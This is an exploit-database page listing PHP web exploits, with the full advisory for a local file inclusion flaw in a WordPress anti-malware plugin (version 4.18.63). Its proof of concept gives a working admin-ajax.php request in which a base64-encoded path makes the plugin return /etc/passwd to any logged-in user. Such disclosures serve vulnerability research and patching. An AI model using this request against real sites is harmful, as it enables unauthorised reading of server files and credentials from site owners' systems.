Menu

Improved exploit search engine. Try it out

"WordPress Plugin Anti-Malware Security and Brute-Force Firewall 4.18.63 - Local File Inclusion"

Author

"Ali S. Ahmad"

Platform

php

Release date

2019-03-28

Release Date Title Type Platform Author
2019-06-20 "WebERP 4.15 - SQL injection" webapps php "Semen Alexandrovich Lyhin"
2019-06-17 "AROX School-ERP Pro - Unauthenticated Remote Command Execution (Metasploit)" remote php AkkuS
2019-06-12 "FusionPBX 4.4.3 - Remote Command Execution" webapps php "Dustin Cobb"
2019-06-11 "phpMyAdmin 4.8 - Cross-Site Request Forgery" webapps php Riemann
2019-06-11 "WordPress Plugin Insert or Embed Articulate Content into WordPress - Remote Code Execution" webapps php xulchibalraa
2019-06-10 "UliCMS 2019.1 'Spitting Lama' - Persistent Cross-Site Scripting" webapps php Unk9vvN
2019-06-04 "IceWarp 10.4.4 - Local File Inclusion" webapps php JameelNabbo
2019-06-03 "WordPress Plugin Form Maker 1.13.3 - SQL Injection" webapps php "Daniele Scanu"
2019-06-03 "KACE System Management Appliance (SMA) < 9.0.270 - Multiple Vulnerabilities" webapps php SlidingWindow
2019-05-29 "pfSense 2.4.4-p3 (ACME Package 0.59_14) - Persistent Cross-Site Scripting" webapps php "Chi Tran"
2019-05-24 "Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC" webapps php "Todor Donev"
2019-05-23 "Nagios XI 5.6.1 - SQL injection" webapps php JameelNabbo
2019-05-22 "Horde Webmail 5.2.22 - Multiple Vulnerabilities" webapps php InfinitumIT
2019-05-21 "WordPress Plugin WPGraphQL 0.2.3 - Multiple Vulnerabilities" webapps php "Simone Quatrini"
2019-05-21 "Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scripting" webapps php "Dionach Ltd"
2019-05-23 "Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)" remote php Metasploit
2019-05-20 "eLabFTW 1.8.5 - Arbitrary File Upload / Remote Code Execution" webapps php liquidsky
2019-05-20 "GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)" remote php Metasploit
2019-05-17 "Interspire Email Marketer 6.20 - 'surveys_submit.php' Remote Code Execution" webapps php "numan türle"
2019-05-16 "DeepSound 1.0.4 - SQL Injection" webapps php "Mehmet EMIROGLU"
2019-05-15 "Legrand BTicino Driver Manager F454 1.0.51 - Cross-Site Request Forgery / Cross-Site Scripting" webapps php LiquidWorm
2019-05-15 "CommSy 8.6.5 - SQL injection" webapps php "Jens Regel_ Schneider_ Wulf"
2019-05-14 "PasteShr 1.6 - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-05-14 "Schneider Electric U.Motion Builder 1.3.4 - 'track_import_export.php object_id' Unauthenticated Command Injection" webapps php "Julien Ahrens"
2019-05-14 "Sales ERP 8.1 - Multiple SQL Injection" webapps php "Mehmet EMIROGLU"
2019-05-14 "PHP-Fusion 9.03.00 - 'Edit Profile' Remote Code Execution (Metasploit)" remote php AkkuS
2019-05-13 "OpenProject 5.0.0 - 8.3.1 - SQL Injection" webapps php "SEC Consult"
2019-05-13 "XOOPS 2.5.9 - SQL Injection" webapps php "felipe andrian"
2019-05-13 "SOCA Access Control System 180612 - Cross-Site Request Forgery (Add Admin)" webapps php LiquidWorm
2019-05-13 "SOCA Access Control System 180612 - SQL Injection" webapps php LiquidWorm
Release Date Title Type Platform Author
2019-03-28 "WordPress Plugin Loco Translate 2.2.1 - Local File Inclusion" webapps php "Ali S. Ahmad"
2019-03-28 "WordPress Plugin Anti-Malware Security and Brute-Force Firewall 4.18.63 - Local File Inclusion" webapps php "Ali S. Ahmad"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46618/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46618/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46618/41069/wordpress-plugin-anti-malware-security-and-brute-force-firewall-41863-local-file-inclusion/download/", "exploit_id": "46618", "exploit_description": "\"WordPress Plugin Anti-Malware Security and Brute-Force Firewall 4.18.63 - Local File Inclusion\"", "exploit_date": "2019-03-28", "exploit_author": "\"Ali S. Ahmad\"", "exploit_type": "webapps", "exploit_platform": "php", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
# Exploit Title: Wordpress Anti-Malware Security and Bruteforce Firewall - Local File Inclusion
# Google Dork: N/A
# Date: 03 / 26 / 2019
# Exploit Author: Ali S. Ahmad (S4R1N)
# Vendor Homepage: N/A
# Software Link: https://wordpress.org/plugins/gotmls/
# Version: (Version 4.18.63)
# Tested on: Debian GNU/Linux 9 (Docker)
# CVE : N/A
***********************************************************************
Discovered By: Ali S. Ahmad (S4R1N) 03 / 26 / 2019
***********************************************************************
A local file inclusion bug was discovered on the Wordpress Anti-Malware Security and Bruteforce Firewall (Version 4.18.63) plugin. 
This bug affects the file scan functionality of the plugin and can be exploited by any authenticated user (from subscriber to admin) simply by modifying the GOTMLS_scan= with a base64 encoded path to the file the attacker is trying to read. (example : GOTMLS_scan=L2V0Yy9wYXNzd2Q)
***********************************************************************
Tools used : 
Attacker OS : Fedora 29 
Victim OS : Debian GNU/Linux 9 (running on docker)
Manual Testing tool : Burp Repeater / Browser
***********************************************************************
Proof of Concept (PoC):

Step 1 - Log into Wordpress instance
Step 2 - Go to /wp-admin/admin-ajax.php?action=GOTMLS_scan&GOTMLS_mt=32fd564ad6974510e6bcd22815853f3d&mt=1553627072.7669&page=GOTMLS-settings&GOTMLS_scan=<base64 encoded file path>

URL : the following should yeild the contents of /etc/passwd /wp-admin/admin-ajax.php?action=GOTMLS_scan&GOTMLS_mt=32fd564ad6974510e6bcd22815853f3d&mt=1553627072.7669&page=GOTMLS-settings&GOTMLS_scan=L2V0Yy9wYXNzd2Q